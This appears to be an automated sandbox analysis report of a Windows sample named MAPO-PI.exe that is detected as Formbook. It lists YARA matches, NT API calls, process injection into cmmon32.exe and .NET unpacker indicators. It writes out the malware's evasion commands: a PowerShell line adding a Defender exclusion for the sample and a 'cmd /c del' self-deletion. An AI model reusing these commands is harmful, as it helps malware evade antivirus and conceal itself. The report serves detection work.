          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 0_2_00075376
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 0_2_0094E6A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 0_2_0094E690
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 0_2_0094CC5C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 0_2_00072050
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041E269
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041DA87
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041D475
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00409E2B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00409E30
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041DFFF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CF96
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00EB5376
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189F900
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AB090
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019620A8
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019628EC
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951002
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196E824
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA830
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CEBB0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195DBD2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019503DA
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CABD8
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E3
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01962B28
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAB40
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019622AE
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194FA2B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019625DD
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01962D07
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01890D20
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01961D55
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A841F
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195D466
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196DFCE
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01961FF1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01962EF7
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195D616
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B6E30
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00EB2050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2D466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D325DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C92581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D31D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D32D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C60D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D32EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C86E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D31FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D328EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C920A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D320A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3E824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C899BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C84120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D322AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D1FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D203DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D32B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304E269
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304DA87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CF96
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03032FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304DFFF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03039E2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03039E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03032D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304D475
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04C6B150 appears 66 times
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: String function: 0189B150 appears 133 times
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419D50 NtCreateFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E00 NtReadFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E80 NtClose,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419D4A NtCreateFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419DFB NtReadFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419DA2 NtCreateFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E7A NtClose,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419F2D NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9560 NtWriteFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA770 NtOpenThread,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E00 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E80 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049F2D NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E7A NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049D4A NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049DA2 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049DFB NtReadFile,
          Source: MAPO-PI.exeBinary or memory string: OriginalFilename vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000000.00000002.237496370.000000000008A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
          Source: MAPO-PI.exeBinary or memory string: OriginalFilename vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000003.00000000.232786703.0000000000ECA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000003.00000002.293450051.0000000001859000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MAPO-PI.exe
          Source: MAPO-PI.exeBinary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
          Source: MAPO-PI.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: MAPO-PI.exeVirustotal: Detection: 30%
          Source: MAPO-PI.exeReversingLabs: Detection: 39%
          Source: MAPO-PI.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\MAPO-PI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\MAPO-PI.exe 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\MAPO-PI.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAPO-PI.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p05gvjwq.ucq.ps1Jump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/5@3/3
          Source: C:\Users\user\Desktop\MAPO-PI.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: MAPO-PI.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: MAPO-PI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: MAPO-PI.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: MAPO-PI.exe, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
